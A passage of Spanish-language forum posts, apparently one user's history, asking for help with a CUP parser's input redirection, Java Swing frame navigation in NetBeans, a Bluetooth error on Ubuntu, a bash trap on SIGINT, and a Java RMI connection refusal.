hola estoy haciendo un analizador léxico y sintáctico en lex y cup, bueno pues en el cup necesito cambiar la entrada por defecto por un archivo, en la sección de código ingreso esto:

parser code {:
      

   

   public static void main (String argv[]) throws Exception

   {      

      if (argv.length!=1){System.out.println("Número de argumentos incorrecto!");System.exit(0);}
           else
          {
         parser analizador;
         System.in =new java.io.FileInputStream(argv[0]);
         analizador = new parser(new Scan(System.in));      
         analizador.parse();
      }

   }   

:};


pero no me deja,me dice que la variable .in es una variable final..alguien sabe como se hace?? gracias
#27
Java / java y frames
20 Mayo 2008, 18:01 PM
buenas,buena tengo que entregar una práctica en java de interconexión con postgresql,jdbc y esas cosas, pues bien, debo d hacer una especie de gestor "cutre" que permita ingresas n la bbdd y hacer alguna consulta, cosa que no creo que sea muy dificil si se hiciese por consola,pero nos han pedido k les hagamos un entorno gráfico,por lo que hay que hacer unas ventanitas d navegación, que si una primera que te pida user y pass,otra segunda dnd hacer la consulta,etc...

bien pues ese es el problema,k no tengo ni idea d como va el tema en java,me bajé l netbeans y bueno lo de meter Frames es fácil, meto varíos en el mismo package,pero no consigo interactuar entre ellos,a lo máximo que he llegado ha sido a que desde el principal , cuando pinche un botón muestre otro ,pero no consigo que el primero se oculte,cosa que sería deseable pa no tener 20 ventanas abiertas,esto lo hago con:

    private void ConvertirButtonActionPerformed(java.awt.event.ActionEvent evt) {
        // TODO add your handling code here:
       
        new frame2().setVisible(true);
        new pruebaFrames().setVisible(false);
    }

el segundo si que me lo muestra,pero el primero no m lo oculta,y bueno solo quería pedir un pokito d info,ya buske por internet pero agradecería algo más específico,no de como trabajar con el JDBC que eso se hacerlo,si no sobre todo como manipular los frames,interactuar entre ellos...gracias!

una cosa, en el netbeans al crear proyecto,no creo una clase principal, sino k una vez kreado el proyecto vacío añado Frames,y hago que uno d ellos sea el principal,está esto bien?o debo crear una clase principal independiente de los frames y desde ahi manipularlos ????gracias d nuevo
#28
bueno, pues eso, el portatil me viene con bluetooth de serie, pero no se como hacer que me lo reconozca ubuntu, me he instalado bluez-utils y gnome-bluetooth... me salen los 2 iconos:

         -Comparticion de archivos
         -Administrador Bluetooth

pero les pincho y nada, si en un terminal pongo lo siguiente miren lo que ocurre:

Citar@hack4free:~$ gnome-bluetooth-manager
Traceback (most recent call last):
  File "/usr/lib/python2.4/site-packages/gnomebt/manager.py", line 274, in ?
    BTManager ().main ()
  File "/usr/lib/python2.4/site-packages/gnomebt/manager.py", line 85, in __init__
    if not self.btctl.is_initialised():
gobject.GError: Can't get device id of hci0


alguna idea??? no se sikiera si m reconoce l bluetooth o k pasa..
#29
Scripting / duda con procesos en bash
8 Marzo 2007, 20:17 PM
bueno, estoy haciendo unas cosillan en bash con procesos, y tengo una duda al usar la orden trap, he hecho un ejemplo simple que debería reaccionar ante la señal de interrupción 2 imprimiendo un echo, pero.. no lo hace... os adjunto el código para ver si encontrais algo..

declare I=0
echo antes del trap

trap \'echo hola\' 2

for I in 1 2 3 4 5
do
        echo dentro del bucle en la iteración: $I

        sleep 100
done



than ks
#30
Java / ayuda URGENTE java RMI
28 Enero 2007, 11:34 AM
Estoy haciendo un proyecto en java, una especie de cola de impresion, en la que el Servidor ofrece el servicio de meter documentos en la cola, y de leer estadisticas de esta misma, y el Cliente unicamente añade documentos, o saka por pantalla las estadísticas leidas del Servidor.
Bien, pues los intento conectar por RMI (en la misma maquina), pero me da un fallo y lo necesito arreglar, el fallo es el siguiente:

Compilo el interfaz del servidor, luego el servidor, con RMIC compilo el servidor, pongo el CLASSPATH=., y finalmente inicio el rmregistry( start rmregistry), después, simplemente compilo el cliente, y corro el servidor y el cliente.
El error da al intentar conectarse el cliente al servidor, me dice que se rechazo la conexión, o que no fue posible o algo asi..

alguien podria ayudarme? o darme alguna idea o algo¿¿

añadir que el proyecto esta hecho con el NetBeans, y en un paquete está el Servidor y el Clinte , para no tener que andar copiando clases y eso...

les agradeceria muchiiiiiiiiiiiisimo su ayuda